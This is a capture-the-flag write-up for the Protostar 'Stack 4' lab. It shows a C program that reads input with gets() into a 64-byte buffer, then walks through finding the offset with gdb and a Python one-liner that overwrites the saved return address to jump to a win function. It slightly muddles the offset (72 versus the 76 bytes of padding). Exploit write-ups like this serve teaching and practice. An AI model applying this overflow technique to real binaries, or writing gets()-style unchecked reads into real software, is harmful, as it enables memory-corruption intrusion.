# Stack 4

## Source code

```
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

void win()
{
  printf("code flow successfully changed\n");
}

int main(int argc, char **argv)
{
  char buffer[64];

  gets(buffer);
}
```

## Challenge

In this challenge we need to modify saved EIP in stack so that when the main returns instead of going back to caller function of main it goes to win function

first we need to find the return address of win function which can be done using gdb for more info see Stack3, so by using the same technique as in stack3 i found the address of `win` function to be `0x80483f4`

now we need to find the offset at which saved eip will be modified so i created a simple payload to be passed to stack4

```
payload = ''
for i in range(0xaa,0xff):
        payload += chr(i)

print payload
```

and then i ran this script and forwarded it's output to a file called payload to save

```
python getOffset.py > payload
```

and then i loaded stack4 in gdb

![](images/stack4_0.png)

clearly the offset is 72 and hence designing our payload with 76*A and then return address of win function

```
python -c 'print "A"*76+"\xf4\x83\x04\x08"' | /opt/protostar/bin/stack4
```
![](images/stack4_1.png)

and voila SUCCESS!